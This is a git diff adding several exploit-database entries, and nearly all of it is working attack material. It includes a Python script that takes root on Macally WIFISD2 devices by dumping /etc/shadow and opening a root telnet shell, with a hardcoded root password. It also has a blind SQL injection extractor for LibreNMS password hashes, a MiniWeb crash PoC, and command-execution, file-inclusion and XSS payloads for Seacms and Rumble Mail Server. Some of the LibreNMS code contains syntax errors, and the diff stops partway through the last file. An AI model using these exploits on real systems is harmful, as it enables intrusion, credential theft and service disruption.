diff --git a/exploits/hardware/webapps/49256.py b/exploits/hardware/webapps/49256.py
new file mode 100755
index 000000000..20f038900
--- /dev/null
+++ b/exploits/hardware/webapps/49256.py
@@ -0,0 +1,140 @@
+# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
+# Date: 03.12.2020 
+# Exploit Author: Maximilian Barz and Daniel Schwendner
+# Vendor Homepage: https://us.macally.com/products/wifisd2
+# Version: 2.000.010
+# Tested on: Kali Linux 5.7.0-kali1-amd64
+# CVE : CVE-2020-29669
+# Reference: https://github.com/S1lkys/CVE-2020-29669/
+
+#!/usr/bin/env/python3
+import requests
+import telnetlib
+import os
+import sys
+import re
+
+banner = '''\033[94m
+  ██████ ▄▄▄█████▓ ▄▄▄       ██▀███   ▄▄▄▄    █    ██  ██▀███    ██████ ▄▄▄█████▓
+▒██    ▒ ▓  ██▒ ▓▒▒████▄    ▓██ ▒ ██▒▓█████▄  ██  ▓██▒▓██ ▒ ██▒▒██    ▒ ▓  ██▒ ▓▒
+░ ▓██▄   ▒ ▓██░ ▒░▒██  ▀█▄  ▓██ ░▄█ ▒▒██▒ ▄██▓██  ▒██░▓██ ░▄█ ▒░ ▓██▄   ▒ ▓██░ ▒░
+  ▒   ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄  ▒██░█▀  ▓▓█  ░██░▒██▀▀█▄    ▒   ██▒░ ▓██▓ ░ 
+▒██████▒▒  ▒██▒ ░  ▓█   ▓██▒░██▓ ▒██▒░▓█  ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒  ▒██▒ ░ 
+▒ ▒▓▒ ▒ ░  ▒ ░░    ▒▒   ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░  ▒ ░░   
+░ ░▒  ░ ░    ░      ▒   ▒▒ ░  ░▒ ░ ▒░▒░▒   ░ ░░▒░ ░ ░   ░▒ ░ ▒░░ ░▒  ░ ░    ░    
+░  ░  ░    ░        ░   ▒     ░░   ░  ░    ░  ░░░ ░ ░   ░░   ░ ░  ░  ░    ░      
+      ░                 ░  ░   ░      ░         ░        ░           ░           
+                                           ░                                     
+\x1b[0m
+Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner 
+'''
+def main():
+    if(len(sys.argv) < 2):
+        print(banner)
+        print("Usage: %s <host> " % sys.argv[0])
+        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
+        return
+    rhost = sys.argv[1]
+    session = requests.Session()
+    guest_creds = "guest_pass"
+    admin_pass_to_set = "Silky123"
+
+    def send_requests():
+        url = "http://"+rhost+"/protocol.csp?function=set"
+        payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/index.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '65',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        
+        r= session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in r.content):
+            print("\033[92m[+] Authentication successful\x1b[0m")
+            print("\t"+str(session.cookies.get_dict()))
+        else:
+            print("\033[91m[+] Authentication failed.\x1b[0m")
+            sys.exit()
+
+        url = "http://"+rhost+"/protocol.csp?fname=security&function=set"    
+        payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/app/user/guest.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '49',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        d = session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in d.content):
+            print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
+            telnet_grep_root_hash()
+            #print("[+] Spawning Admin Shell")
+            #telnet_login()
+        else:
+            print("\033[91m[+] Admin Password change failed\x1b[0m")
+            sys.exit()
+
+
+    def telnet_grep_root_hash():
+        user = "admin"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(admin_pass_to_set.encode('ascii') + b"\n")
+        print("\033[92m[+] Dumping Hashes:\x1b[0m")
+        tn.write(b"cat /etc/shadow\n\r")
+        tn.write(b"exit\n")
+        output = tn.read_all().decode('ascii')
+        L = output.split('\n')
+        for hash in L:
+            if ":" in hash:
+                print("\t"+hash)
+        print("\n\r")
+        for hash in L:
+            if "root" in hash:
+                print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
+                print("\t"+hash)  #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
+                f = open("root_hash","w+")
+                f.write(hash)
+                f.close()
+                crack_root_hash();
+
+
+    def crack_root_hash():
+        f = open("root_hash", "r")
+        hash = f.read()
+        if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
+            print("\033[92mRoot Password: 20080826\x1b[0m\n")
+            telnet_login()
+        else:
+            os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
+
+    def telnet_login():
+        print("\033[92m[+] Spawning Rootshell\x1b[0m")
+        user = "root"
+        root_password="20080826"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(root_password.encode('ascii') + b"\n")
+        tn.interact()
+    print(banner)
+    send_requests()
+
+if(__name__ == '__main__'):
+    main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49246.py b/exploits/multiple/webapps/49246.py
new file mode 100755
index 000000000..82060e3e5
--- /dev/null
+++ b/exploits/multiple/webapps/49246.py
@@ -0,0 +1,263 @@
+# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
+# Google Dork: Unknown
+# Date: 13-12-2020
+# Exploit Author: Hodorsec
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://github.com/librenms/librenms
+# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
+# Version: 1.46
+# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
+# CVE : N/A
+
+#!/usr/bin/python3
+
+# EXAMPLE:
+# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
+# [*] Checking if authentication for page is required...
+# [*] Visiting page to retrieve initial token and cookies...
+# [*] Retrieving authenticated cookie...
+# [*] Printing number of rows in table...
+# 1
+# [*] Found 1 rows of data in table 'users'
+#
+# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# librenms
+# [*] Retrieved value 'librenKs' for column 'username' in row 1
+# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
+# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
+#
+# [+] Done!
+
+import requests
+import urllib3
+import os
+import sys
+import re
+from bs4 import BeautifulSoup
+
+# Optionally, use a proxy
+# proxy = "http://<user>:<pass>@<proxy>:<port>"
+proxy = ""
+os.environ['http_proxy'] = proxy
+os.environ['HTTP_PROXY'] = proxy
+os.environ['https_proxy'] = proxy
+os.environ['HTTPS_PROXY'] = proxy
+
+# Disable cert warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Set timeout
+timeout = 10
+
+# Injection prefix and suffix
+inj_prefix = "(select(sleep("
+inj_suffix = ")))))"
+
+# Decimal begin and end
+dec_begin = 48
+dec_end = 57
+
+# ASCII char begin and end
+ascii_begin = 32
+ascii_end = 126
+
+# Handle CTRL-C
+def keyboard_interrupt():
+    """Handles keyboardinterrupt exceptions"""
+    print("\n\n[*] User requested an interrupt, exiting...")
+    exit(0)
+
+# Custom headers
+def http_headers():
+    headers = {
+        'User-Agent': 'Mozilla',
+    }
+    return headers
+
+def check_auth(url,headers):
+    print("[*] Checking if authentication for page is required...")
+    target = url + "/graph.php"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    if "Unauthorized" in r.text:
+        return True
+    else:
+        return False
+
+def get_initial_token_and_cookies(url,headers):
+    print("[*] Visiting page to retrieve initial token and cookies...")
+    target = url + "/login"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    soup = BeautifulSoup(r.text,'html.parser')
+    for n in soup('input'):
+        if n['name'] == "_token":
+            token = n['value']
+            return token,r.cookies
+        else:
+            return None,r.cookies
+
+def get_valid_cookie(url,headers,token,cookies,usern,passw):
+    print("[*] Retrieving authenticated cookie...")
+    appl_cookie = "laravel_session"
+    post_data = {'_token':token,
+                'username':usern,
+                'password':passw,
+                'submit':''}
+    target = url + "/login"
+    r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.text
+    if "Overview | LibreNMS" in res:
+        return r.cookies
+    else:
+        print("[!] No valid response from used session, exiting!\n")
+        exit(-1)
+
+# Perform the SQLi call for injection
+def sqli(url,headers,cookies,inj_str,sleep):
+    comment_inj_str = re.sub(" ","/**/",inj_str)
+    inj_params = {'id':'1',
+                'stat':'none',
+                'type':'port_mac_acc_total',
+                'sort':comment_inj_str,
+                'debug':'1'}
+    inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
+    # Do GET request
+    r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.elapsed.total_seconds()
+    if res >= sleep:
+        return True
+    elif res < sleep:
+        return False
+    else:
+        print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
+        exit(-1)
+
+# Extract rows
+def get_rows(url,headers,cookies,table,sleep):
+    rows = ""
+    max_pos_rows = 4
+    # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
+    for pos in range(1,max_pos_rows+1):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop decimals
+        direction = "="
+        for num_rows in range(dec_begin,dec_end+1):
+            row_char = chr(num_rows)
+            inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                rows += row_char
+                print(row_char,end='',flush=True)
+                break
+    if rows != "":
+        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
+        return int(rows)
+    else:
+        return False
+
+# Loop through positions and characters
+def get_data(url,headers,cookies,row,column,table,sleep):
+    extracted = ""
+    max_pos_len = 50
+    # Loop through length of string
+    # Not very efficient, should use a guessing algorithm
+    print("[*] Extracting strings from row " + str(row+1) + "...")
+    for pos in range(1,max_pos_len):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop through ASCII printable characters
+        direction = "="
+        for guess in range(ascii_begin,ascii_end+1):
+            extracted_char = chr(guess)
+            inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                extracted += chr(guess)
+                print(extracted_char,end='',flush=True)
+                break
+    return extracted
+
+# Main
+def main(argv):
+    if len(sys.argv) == 5:
+        usern = sys.argv[1]
+        passw = sys.argv[2]
+        url = sys.argv[3]
+        sleep = int(sys.argv[4])
+    else:
+        print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
+        exit(0)
+
+    # Random headers
+    headers = http_headers()
+
+    # Do stuff
+    try:
+        # Get a valid initial token and cookies
+        token,cookies = get_initial_token_and_cookies(url,headers)
+        
+        # Check if authentication is required
+        auth_required = check_auth(url,headers)
+
+        if auth_required:
+            # Get an authenticated session cookie using credentials
+            valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
+        else:
+            valid_cookies = cookies
+            print("[+] Authentication not required, continue without authentication...")
+
+        # Setting the correct vulnerable page
+        url = url + "/graph.php"
+
+        # The columns to retrieve
+        columns = ['username','password']
+
+        # The table to retrieve data from
+        table = "users"
+
+        # Getting rows
+        print("[*] Printing number of rows in table...")
+        rows = get_rows(url,headers,valid_cookies,table,sleep)
+        if not rows:
+            print("[!] Unable to retrieve rows, checks requests.\n")
+            exit(-1)
+
+        # Getting values for found rows in specified columns
+        for column in columns:
+            print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
+            for row in range(0,rows):
+                # rowval_len = get_length(url,headers,row,column,table)
+                retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
+                print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
+        # Done
+        print("\n[+] Done!\n")
+
+    except requests.exceptions.Timeout:
+        print("[!] Timeout error\n")
+        exit(-1)
+    except requests.exceptions.TooManyRedirects:
+        print("[!] Too many redirects\n")
+        exit(-1)
+    except requests.exceptions.ConnectionError:
+        print("[!] Not able to connect to URL\n")
+        exit(-1)
+    except requests.exceptions.RequestException as e:
+        print("[!] " + str(e))
+        exit(-1)
+    except requests.exceptions.HTTPError as e:
+        print("[!] Failed with error code - " + str(e.code) + "\n")
+        exit(-1)
+    except KeyboardInterrupt:
+        keyboard_interrupt()
+        exit(-1)
+
+# If we were called as a program, go execute the main function.
+if __name__ == "__main__":
+    main(sys.argv[1:])
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49247.py b/exploits/multiple/webapps/49247.py
new file mode 100755
index 000000000..8819ba6af
--- /dev/null
+++ b/exploits/multiple/webapps/49247.py
@@ -0,0 +1,55 @@
+# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
+# Date: 13.12.2020
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://sourceforge.net/projects/miniweb/
+# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
+# Version: 0.8.19
+# Tested on: Win7 x86
+# Researchers: Security For Everyone Team - https://securityforeveryone.com
+
+'''
+Description
+
+ MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
+ first parameter in a POST request.
+
+Exploitation
+
+ The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
+ if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.
+
+About Security For Everyone Team
+
+We are a team that has been working on cyber security in the industry for a long time. 
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
+
+'''
+
+#!/usr/bin/python
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) != 2 :
+	print "[+] Usage : python exploit.py [VICTIM_IP]"
+	exit(0)
+
+TCP_IP = sys.argv[1]
+TCP_PORT = 8000
+
+xx = "A"*2038 #4085
+
+http_req = "POST /index.html HTTP/1.1\r\n"
+http_req += "Host: 192.168.231.140\r\n"
+http_req += "From: header-data\r\n"
+http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+http_req += xx + "=param_data1&param_name2=param_data2"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TCP_IP, TCP_PORT))
+print "[+] Sending exploit payload..."
+s.send(http_req)
+s.close()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49249.txt b/exploits/multiple/webapps/49249.txt
new file mode 100644
index 000000000..f7202209a
--- /dev/null
+++ b/exploits/multiple/webapps/49249.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F
+
+Vulnerable parameters：ip
+
+payload：";phpinfo();//
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49250.txt b/exploits/multiple/webapps/49250.txt
new file mode 100644
index 000000000..acedb7419
--- /dev/null
+++ b/exploits/multiple/webapps/49250.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+Vulnerable parameters： file
+
+payload：C:/windows/system.ini
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49251.txt b/exploits/multiple/webapps/49251.txt
new file mode 100644
index 000000000..fec335073
--- /dev/null
+++ b/exploits/multiple/webapps/49251.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4
+
+Vulnerable parameters： checkuser
+
+payload："><ScRiPt>alert(document.cookie)</ScRiPt>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49252.txt b/exploits/multiple/webapps/49252.txt
new file mode 100644
index 000000000..2bdfffc61
--- /dev/null
+++ b/exploits/multiple/webapps/49252.txt
@@ -0,0 +1,36 @@
+# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
+# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
+# Date: 2020-12-12
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.boldgrid.com/
+# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
+# Version: 1.14.9
+# Tested on: BackBox Linux
+
+1) 'readme.txt' file reveal the plugin version :
+-> GET /wp-content/plugins/boldgrid-backup/readme.txt
+Stable tag: 1.14.9
+
+2) 'env-info.php' file reveals the following informations without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
+{
+    [...],
+    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
+86_64",
+    "php_version":"7.X.X",
+    "server_addr":"127.0.0.1",
+    "server_name":"www.example.com",
+    "server_protocol":"HTTP/1.1",
+    "server_software":"Apache/2.X.XX (Ubuntu)",
+    "uid":XX,
+    "username":"www-data"
+}
+
+3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
+{
+    [...]
+    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
+    [...]
+}
+--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49253.txt b/exploits/multiple/webapps/49253.txt
new file mode 100644
index 000000000..a2bbed8f8
--- /dev/null
+++ b/exploits/multiple/webapps/49253.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /settings:save HTTP/1.1
+Host: 127.0.0.1:2580
+Connection: keep-alive
+Content-Length: 343
+Cache-Control: max-age=0
+Authorization: Basic YWRtaW46YWRtaW4=
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1:2580
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1:2580/settings
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+
+save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
+HTTP/1.1 302 Moved
+Location: /settings:save
+
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on <script>alert(xss.com)</script><br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h1>Server settings</h1>
+
+Saving config/rumble.conf
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49254.txt b/exploits/multiple/webapps/49254.txt
new file mode 100644
index 000000000..c94a10cea
--- /dev/null
+++ b/exploits/multiple/webapps/49254.txt
@@ -0,0 +1,105 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Info
+The parameters `domain` and `path` are vulnerable to stored XSS.
+
+# Exploit:
+POST /domains HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
+Upgrade-Insecure-Requests: 1
+
+domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
